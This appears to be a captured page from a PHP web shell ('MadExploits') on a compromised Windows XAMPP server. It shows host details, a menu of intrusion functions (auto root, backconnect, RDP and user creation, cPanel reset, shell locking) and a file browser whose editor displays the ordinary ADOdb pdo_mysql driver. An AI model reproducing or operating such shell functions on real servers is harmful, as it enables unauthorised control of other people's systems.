Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
php /
pear /
adodb /
drivers /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adodb-access.inc.php
2.13
KB
-rw-rw-rw-
adodb-ado.inc.php
15.98
KB
-rw-rw-rw-
adodb-ado5.inc.php
17.08
KB
-rw-rw-rw-
adodb-ado_access.inc.php
1.39
KB
-rw-rw-rw-
adodb-ado_mssql.inc.php
4.35
KB
-rw-rw-rw-
adodb-ads.inc.php
23.41
KB
-rw-rw-rw-
adodb-borland_ibase.inc.php
2.19
KB
-rw-rw-rw-
adodb-csv.inc.php
4.75
KB
-rw-rw-rw-
adodb-db2.inc.php
21.59
KB
-rw-rw-rw-
adodb-db2oci.inc.php
4.58
KB
-rw-rw-rw-
adodb-db2ora.inc.php
1.62
KB
-rw-rw-rw-
adodb-fbsql.inc.php
6.37
KB
-rw-rw-rw-
adodb-firebird.inc.php
1.88
KB
-rw-rw-rw-
adodb-ibase.inc.php
24.76
KB
-rw-rw-rw-
adodb-informix.inc.php
980
B
-rw-rw-rw-
adodb-informix72.inc.php
14.44
KB
-rw-rw-rw-
adodb-ldap.inc.php
12.11
KB
-rw-rw-rw-
adodb-mssql.inc.php
33.8
KB
-rw-rw-rw-
adodb-mssql_n.inc.php
7.14
KB
-rw-rw-rw-
adodb-mssqlnative.inc.php
30.08
KB
-rw-rw-rw-
adodb-mssqlpo.inc.php
1.49
KB
-rw-rw-rw-
adodb-mysql.inc.php
22.8
KB
-rw-rw-rw-
adodb-mysqli.inc.php
32.66
KB
-rw-rw-rw-
adodb-mysqlpo.inc.php
3.14
KB
-rw-rw-rw-
adodb-mysqlt.inc.php
3.72
KB
-rw-rw-rw-
adodb-netezza.inc.php
5.03
KB
-rw-rw-rw-
adodb-oci8.inc.php
46.43
KB
-rw-rw-rw-
adodb-oci805.inc.php
1.54
KB
-rw-rw-rw-
adodb-oci8po.inc.php
5.53
KB
-rw-rw-rw-
adodb-odbc.inc.php
19.33
KB
-rw-rw-rw-
adodb-odbc_db2.inc.php
9.13
KB
-rw-rw-rw-
adodb-odbc_mssql.inc.php
10.52
KB
-rw-rw-rw-
adodb-odbc_oracle.inc.php
3.12
KB
-rw-rw-rw-
adodb-odbtp.inc.php
23.29
KB
-rw-rw-rw-
adodb-odbtp_unicode.inc.php
1.1
KB
-rw-rw-rw-
adodb-oracle.inc.php
9.2
KB
-rw-rw-rw-
adodb-pdo.inc.php
14.73
KB
-rw-rw-rw-
adodb-pdo_mssql.inc.php
1.41
KB
-rw-rw-rw-
adodb-pdo_mysql.inc.php
5
KB
-rw-rw-rw-
adodb-pdo_oci.inc.php
2.6
KB
-rw-rw-rw-
adodb-pdo_pgsql.inc.php
8.26
KB
-rw-rw-rw-
adodb-pdo_sqlite.inc.php
5.78
KB
-rw-rw-rw-
adodb-postgres.inc.php
515
B
-rw-rw-rw-
adodb-postgres64.inc.php
31.51
KB
-rw-rw-rw-
adodb-postgres7.inc.php
11
KB
-rw-rw-rw-
adodb-postgres8.inc.php
348
B
-rw-rw-rw-
adodb-postgres9.inc.php
1.59
KB
-rw-rw-rw-
adodb-proxy.inc.php
805
B
-rw-rw-rw-
adodb-sapdb.inc.php
4.98
KB
-rw-rw-rw-
adodb-sqlanywhere.inc.php
4.13
KB
-rw-rw-rw-
adodb-sqlite.inc.php
10.27
KB
-rw-rw-rw-
adodb-sqlite3.inc.php
12
KB
-rw-rw-rw-
adodb-sqlitepo.inc.php
1.82
KB
-rw-rw-rw-
adodb-sybase.inc.php
12.71
KB
-rw-rw-rw-
adodb-sybase_ase.inc.php
3.18
KB
-rw-rw-rw-
adodb-vfp.inc.php
2.42
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : adodb-pdo_mysql.inc.php
<?php /* V5.18 3 Sep 2012 (c) 2000-2012 John Lim (jlim#natsoft.com). All rights reserved. Released under both BSD license and Lesser GPL library license. Whenever there is any discrepancy between the two licenses, the BSD license will take precedence. Set tabs to 8. */ class ADODB_pdo_mysql extends ADODB_pdo { var $metaTablesSQL = "SHOW TABLES"; var $metaColumnsSQL = "SHOW COLUMNS FROM `%s`"; var $sysDate = 'CURDATE()'; var $sysTimeStamp = 'NOW()'; var $hasGenID = true; var $_genIDSQL = "update %s set id=LAST_INSERT_ID(id+1);"; var $_dropSeqSQL = "drop table %s"; var $fmtTimeStamp = "'Y-m-d, H:i:s'"; var $nameQuote = '`'; function _init($parentDriver) { $parentDriver->hasTransactions = false; #$parentDriver->_bindInputArray = false; $parentDriver->hasInsertID = true; $parentDriver->_connectionID->setAttribute(PDO::MYSQL_ATTR_USE_BUFFERED_QUERY,true); } // dayFraction is a day in floating point function OffsetDate($dayFraction,$date=false) { if (!$date) $date = $this->sysDate; $fraction = $dayFraction * 24 * 3600; return $date . ' + INTERVAL ' . $fraction.' SECOND'; // return "from_unixtime(unix_timestamp($date)+$fraction)"; } function Concat() { $s = ""; $arr = func_get_args(); // suggestion by andrew005#mnogo.ru $s = implode(',',$arr); if (strlen($s) > 0) return "CONCAT($s)"; return ''; } function ServerInfo() { $arr['description'] = ADOConnection::GetOne("select version()"); $arr['version'] = ADOConnection::_findvers($arr['description']); return $arr; } function MetaTables($ttype=false,$showSchema=false,$mask=false) { $save = $this->metaTablesSQL; if ($showSchema && is_string($showSchema)) { $this->metaTablesSQL .= " from $showSchema"; } if ($mask) { $mask = $this->qstr($mask); $this->metaTablesSQL .= " like $mask"; } $ret = ADOConnection::MetaTables($ttype,$showSchema); $this->metaTablesSQL = $save; return $ret; } function SetTransactionMode( $transaction_mode ) { $this->_transmode = $transaction_mode; if (empty($transaction_mode)) { $this->Execute('SET TRANSACTION ISOLATION LEVEL REPEATABLE READ'); return; } if (!stristr($transaction_mode,'isolation')) $transaction_mode = 'ISOLATION LEVEL '.$transaction_mode; $this->Execute("SET SESSION TRANSACTION ".$transaction_mode); } function MetaColumns($table,$normalize=true) { $this->_findschema($table,$schema); if ($schema) { $dbName = $this->database; $this->SelectDB($schema); } global $ADODB_FETCH_MODE; $save = $ADODB_FETCH_MODE; $ADODB_FETCH_MODE = ADODB_FETCH_NUM; if ($this->fetchMode !== false) $savem = $this->SetFetchMode(false); $rs = $this->Execute(sprintf($this->metaColumnsSQL,$table)); if ($schema) { $this->SelectDB($dbName); } if (isset($savem)) $this->SetFetchMode($savem); $ADODB_FETCH_MODE = $save; if (!is_object($rs)) { $false = false; return $false; } $retarr = array(); while (!$rs->EOF){ $fld = new ADOFieldObject(); $fld->name = $rs->fields[0]; $type = $rs->fields[1]; // split type into type(length): $fld->scale = null; if (preg_match("/^(.+)\((\d+),(\d+)/", $type, $query_array)) { $fld->type = $query_array[1]; $fld->max_length = is_numeric($query_array[2]) ? $query_array[2] : -1; $fld->scale = is_numeric($query_array[3]) ? $query_array[3] : -1; } elseif (preg_match("/^(.+)\((\d+)/", $type, $query_array)) { $fld->type = $query_array[1]; $fld->max_length = is_numeric($query_array[2]) ? $query_array[2] : -1; } elseif (preg_match("/^(enum)\((.*)\)$/i", $type, $query_array)) { $fld->type = $query_array[1]; $arr = explode(",",$query_array[2]); $fld->enums = $arr; $zlen = max(array_map("strlen",$arr)) - 2; // PHP >= 4.0.6 $fld->max_length = ($zlen > 0) ? $zlen : 1; } else { $fld->type = $type; $fld->max_length = -1; } $fld->not_null = ($rs->fields[2] != 'YES'); $fld->primary_key = ($rs->fields[3] == 'PRI'); $fld->auto_increment = (strpos($rs->fields[5], 'auto_increment') !== false); $fld->binary = (strpos($type,'blob') !== false); $fld->unsigned = (strpos($type,'unsigned') !== false); if (!$fld->binary) { $d = $rs->fields[4]; if ($d != '' && $d != 'NULL') { $fld->has_default = true; $fld->default_value = $d; } else { $fld->has_default = false; } } if ($save == ADODB_FETCH_NUM) { $retarr[] = $fld; } else { $retarr[strtoupper($fld->name)] = $fld; } $rs->MoveNext(); } $rs->Close(); return $retarr; } // parameters use PostgreSQL convention, not MySQL function SelectLimit($sql,$nrows=-1,$offset=-1,$inputarr=false,$secs=0) { $offsetStr =($offset>=0) ? "$offset," : ''; // jason judge, see http://phplens.com/lens/lensforum/msgs.php?id=9220 if ($nrows < 0) $nrows = '18446744073709551615'; if ($secs) $rs = $this->CacheExecute($secs,$sql." LIMIT $offsetStr$nrows",$inputarr); else $rs = $this->Execute($sql." LIMIT $offsetStr$nrows",$inputarr); return $rs; } } ?>
Close